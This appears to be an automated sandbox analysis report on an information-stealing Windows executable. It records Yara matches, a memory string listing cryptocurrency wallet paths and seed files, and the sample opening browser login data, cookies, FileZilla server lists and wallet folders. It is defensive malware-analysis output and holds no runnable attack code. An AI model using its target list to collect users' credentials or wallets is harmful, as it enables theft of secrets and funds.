Source: Yara match File source: 00000002.00000002.2079175152.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2079734656.0000000000D17000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1719187407.0000000000F1A000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ND2WP0Fip7.exe PID: 4296, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: ND2WP0Fip7.exe PID: 4296, type: MEMORYSTR
Source: ND2WP0Fip7.exe String found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\E
Source: ND2WP0Fip7.exe String found in binary or memory: odus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)
Source: ND2WP0Fip7.exe String found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\E
Source: ND2WP0Fip7.exe String found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\E
Source: ND2WP0Fip7.exe String found in binary or memory: odus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)
Source: ND2WP0Fip7.exe String found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\E
Source: ND2WP0Fip7.exe String found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\E
Source: ND2WP0Fip7.exe String found in binary or memory: odus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)
Source: ND2WP0Fip7.exe String found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\E
Source: ND2WP0Fip7.exe String found in binary or memory: odus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)
Source: ND2WP0Fip7.exe String found in binary or memory: 1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Bi
Source: ND2WP0Fip7.exe String found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\E
Source: ND2WP0Fip7.exe String found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\E
Source: ND2WP0Fip7.exe String found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\E
Source: ND2WP0Fip7.exe String found in binary or memory: 1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Bi
Source: ND2WP0Fip7.exe String found in binary or memory: ance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1
Source: ND2WP0Fip7.exe String found in binary or memory: \Exodus\exodus.wallet\
Source: ND2WP0Fip7.exe String found in binary or memory: odus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)
Source: ND2WP0Fip7.exe String found in binary or memory: odus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)
Source: ND2WP0Fip7.exe String found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\E
Source: ND2WP0Fip7.exe String found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\E
Source: ND2WP0Fip7.exe, 00000002.00000002.2079734656.0000000000D6E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\*.*
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Source: Yara match File source: Process Memory Space: ND2WP0Fip7.exe PID: 4296, type: MEMORYSTR

Remote Access Functionality

barindex
Source: Yara match File source: 2.2.ND2WP0Fip7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.ND2WP0Fip7.exe.f1ab30.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.ND2WP0Fip7.exe.f1ab30.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.ND2WP0Fip7.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.ND2WP0Fip7.exe.e80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.2079175152.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2079734656.0000000000D17000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1719187407.0000000000F1A000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ND2WP0Fip7.exe PID: 4296, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: ND2WP0Fip7.exe PID: 4296, type: MEMORYSTR
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_6C7D0C40 sqlite3_bind_zeroblob, 2_2_6C7D0C40
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_6C7D0D60 sqlite3_bind_parameter_name, 2_2_6C7D0D60
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_6C6F8EA0 sqlite3_clear_bindings, 2_2_6C6F8EA0
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_6C7D0B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob, 2_2_6C7D0B40
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_6C6F6410 bind,WSAGetLastError, 2_2_6C6F6410
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_6C6F6070 PR_Listen, 2_2_6C6F6070
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_6C6FC050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp, 2_2_6C6FC050
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_6C6FC030 sqlite3_bind_parameter_count, 2_2_6C6FC030
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_6C6F60B0 listen,WSAGetLastError, 2_2_6C6F60B0
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_6C6822D0 sqlite3_bind_blob, 2_2_6C6822D0
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_6C6F63C0 PR_Bind, 2_2_6C6F63C0
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs